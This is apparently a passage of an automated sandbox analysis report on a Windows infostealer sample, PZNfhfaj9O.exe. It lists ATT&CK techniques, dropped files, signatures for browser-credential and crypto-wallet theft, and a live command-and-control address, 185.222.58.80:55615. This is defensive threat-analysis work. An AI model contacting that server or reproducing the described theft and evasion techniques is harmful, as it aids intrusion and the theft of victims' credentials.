                    Source: Yara matchFile source: 00000000.00000002.1866595947.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7148, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: PZNfhfaj9O.exe PID: 7204, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CiENBY.exe PID: 7728, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		11
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    Query Registry                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory331
                    Security Software Discovery                    		Remote Desktop Protocol3
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		241
                    Virtualization/Sandbox Evasion                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS241
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture12
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Timestomp                    		DCSync113
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532739 Sample: PZNfhfaj9O.exe Startdate: 13/10/2024 Architecture: WINDOWS Score: 100 50 api.ip.sb 2->50 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 11 other signatures 2->60 8 PZNfhfaj9O.exe 7 2->8         started        12 CiENBY.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\Roaming\CiENBY.exe, PE32 8->42 dropped 44 C:\Users\user\...\CiENBY.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmp3010.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\PZNfhfaj9O.exe.log, ASCII 8->48 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 8->64 66 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 8->66 72 2 other signatures 8->72 14 PZNfhfaj9O.exe 15 47 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        26 2 other processes 8->26 68 Multi AV Scanner detection for dropped file 12->68 70 Injects a PE file into a foreign processes 12->70 22 CiENBY.exe 12->22         started        24 schtasks.exe 12->24         started        signatures6 process7 dnsIp8 52 185.222.58.80, 49737, 49741, 49742 ROOTLAYERNETNL Netherlands 14->52 28 conhost.exe 14->28         started        74 Loading BitLocker PowerShell Module 18->74 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        76 Found many strings related to Crypto-Wallets (likely being stolen) 22->76 78 Tries to harvest and steal browser information (history, passwords, etc) 22->78 80 Tries to steal Crypto Currency Wallets 22->80 36 conhost.exe 22->36         started        38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    PZNfhfaj9O.exe61%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                    PZNfhfaj9O.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\CiENBY.exe61%ReversingLabsByteCode-MSIL.Backdoor.FormBook

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                    http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      185.222.58.80:55615true
                        		unknown
                        http://185.222.58.80:55615/true
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabCiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designersGPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/?PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn/bThePZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.fontbureau.com/designers?PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://tempuri.org/Endpoint/EnvironmentSettingsPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://api.ip.sb/geoipPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://schemas.xmlsoap.org/soap/envelope/CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ns.microsoft.co2/t/ReCiENBY.exe, 00000012.00000002.2079877792.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.tiro.comPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.00000000028D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designersPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.goodfont.co.krPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Endpoint/VerifyUpdateResponsePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://185.222.58.80:5PZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentCiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://tempuri.org/Endpoint/SetEnvironmentResponsePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://www.sajatypeworks.comPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://tempuri.org/Endpoint/GetUpdatesCiENBY.exe, 00000012.00000002.2081500546.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002890000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.00000000028BB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.typography.netDPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cn/cThePZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://api.ipify.orgcookies//settinString.RemovegPZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmptrue
                                                		unknown
                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchCiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/DPleasePZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://tempuri.org/Endpoint/VerifyUpdatePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://tempuri.org/0PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://185.222.58.80:55615PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000003110000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://www.fonts.comPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sandoll.co.krPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.urwpp.deDPleasePZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.zhongyicts.com.cnPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePZNfhfaj9O.exe, 00000000.00000002.1865981717.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, PZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1958380307.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sakkal.comPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ipinfo.io/ip%appdata%PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmptrue
                                                        		unknown
                                                        http://www.apache.org/licenses/LICENSE-2.0PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://www.fontbureau.comPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoCiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drfalse
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://tempuri.org/Endpoint/CheckConnectResponsePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://schemas.datacontract.org/2004/07/PZNfhfaj9O.exe, 00000009.00000002.1975298411.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.000000000296E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://api.ip.sb/geoip%USERPEnvironmentROFILE%PZNfhfaj9O.exe, PZNfhfaj9O.exe, 00000009.00000002.1973035327.0000000000402000.00000040.00000400.00020000.00000000.sdmp, CiENBY.exe, 0000000B.00000002.1959789817.0000000003EDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://api.ip.sbPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002FE0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.dr, tmpC7E7.tmp.9.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://tempuri.org/Endpoint/CheckConnectPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.ecosia.org/newtab/CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0PZNfhfaj9O.exe, CiENBY.exe.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://tempuri.org/Endpoint/SetEnvironPZNfhfaj9O.exe, 00000009.00000002.1975298411.000000000315A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://www.carterandcone.comlPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://ac.ecosia.org/autocomplete?q=CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/cabarga.htmlNPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.founder.com.cn/cnPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/frere-user.htmlPZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressingPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://tempuri.org/Endpoint/GetUpdatesResponsePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://www.jiyu-kobo.co.jp/PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://tempuri.org/Endpoint/EnvironmentSettingsResponsePZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.fontbureau.com/designers8PZNfhfaj9O.exe, 00000000.00000002.1869321281.0000000006F82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=CiENBY.exe, 00000012.00000002.2087050965.0000000003983000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2087050965.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, tmpDF76.tmp.18.dr, tmpA7F8.tmp.18.dr, tmpA787.tmp.18.dr, tmp92A9.tmp.9.dr, tmp9255.tmp.9.dr, tmp9298.tmp.9.dr, tmpA798.tmp.18.dr, tmpC7C5.tmp.9.dr, tmpDFB8.tmp.18.dr, tmp9277.tmp.9.dr, tmp92B9.tmp.9.dr, tmpC7B5.tmp.9.dr, tmpDF86.tmp.18.dr, tmp5CCD.tmp.9.dr, tmpA7D8.tmp.18.dr, tmp9266.tmp.9.dr, tmpDF97.tmp.18.dr, tmpC7D6.tmp.9.dr, tmp9287.tmp.9.drfalse
